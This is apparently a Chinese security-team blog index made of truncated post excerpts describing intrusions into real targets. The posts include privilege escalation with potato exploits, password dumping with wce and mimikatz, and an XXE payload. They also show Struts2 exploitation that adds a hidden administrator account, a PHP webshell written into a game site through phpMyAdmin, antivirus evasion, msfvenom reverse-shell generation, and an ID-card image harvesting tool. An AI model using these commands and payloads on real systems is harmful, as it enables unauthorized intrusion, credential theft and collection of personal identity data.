14x security Team

如何使用远控维持提权的system权限比如我们拿到一个shell。是匿名权限，远控的前提是system权限，这个时候我们就需要去使用漏洞的exp去执行到system权限比如potato,提权成功率还是比较高的我们来测试这个时候我们已经成功提权到system我们其实可以利用system去做很多事情比如利用wce,就可以读到管理员的密码也可以使用mimikatz_trunk这个时候我们通过wce读到了管理员的hash，也可以使用-w读管理员明文密码这个时候管理员密码就暴露了我们除...

XXE实体注入测试工具XXE实体注入如SOAP的wsdl接口，就是使用的XML，我们可以自定义参数以及网站地址用法：www.xxx.comXXE漏洞实体注入参数：<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTlTY % remote SYSTEM "/opt">%remote;]>WSDL参数：<?xml...

Struts2版本系列漏洞检查工具提权服务器验证过程通过我们编写的Struts2版本系列漏洞检查工具来进行对漏洞的验证该网站存在struts045的漏洞那么我们先获取到whoami的信息发现是系统权限，那么查看开放的端口？我们发现3389是打开的那么我们就可以建立一个用户并加入到管理员组如net user 0x80 0x80890^&*/%(P /add & net localgroup administrators 0x80 /add在命令输入net use...

某奇葩游戏站点服务器过程目标：xxx游戏站发现有phpmyadmin没想到root空口令直接登录这个管理员是真的有多危险接下来就是找网站路径写马运气太好select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'XX'不多说了，直接getshell了发现既然是system权限，那么直接提权吧找终端经过判断，发现了终端直接进服务器嗅探到了几个rdp的东东，不玩了，就到这里本文章只是技术研究，不做任...

部分安全行业从业人员自研开源扫描器合集fuzz工具收集https://github.com/ivanfratric/winaflhttps://github.com/attekett/NodeFuzzhttps://github.com/google/oss-fuzzhttp://blog.topsec.com.cn/ad_lab/alphafuzzer/http://llvm.org/docs/LibFuzzer.html子域名枚举https://github.com/li...

旁注card查询小助手v1.0https://wws.lanzous.com/idmLBnqd0he密码:5f8u解压密码：fuckml...

神器绕过360杀毒提权内网OA系统过程目标：某XX公司内网OA系统发现有360杀毒，wce传上去直接被杀，烂土豆potato也被杀掉，MSF的木马就更不用说了使用免杀神器提权成功，但是发现没有开启3389，又处于内网所以还需要进行3389开启配合cscript.exe进行On Error Resume Nextconst HKEY_LOCAL_MACHINE = &H80000002strComputer = "."Set StdOut = WSc...

身份证图像采集信息查询工具v1.0关于这个工具很早就想写一个，正好写一个接口查询的工具原理：访问接口，使用正则或者getld获取用户的内容使用io流读写用户图像漏洞调用存在漏洞的接口，进行遍历查询...

烂土豆提权内网遇到credssp加密数据库修正的问题烂土豆提权成功后，使用wce读到了管理员的密码，但是连接出现了credssp加密数据库修正经过测试，MSF也连接失败如果win10没有gpedit.msc就进行加载@echo offpushd "%~dp0"dir /b %systemroot%\Windows\servicing\Packages\Microsoft-Windows-GroupPolicy-ClientExtensions-Packag...

windows 2008 r2 meterpreter转发内网实例我们已经讲过了reDuh转发提权内网实例，今天带来一篇使用msf的meterpreter转发实例准备工具:frp内网穿透工具一台VPS linux主机，一台kali的系统，一台window的系统使用msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XX LPORT=2333 -f c生成一个shellcode，在Microsoft Visual C++进...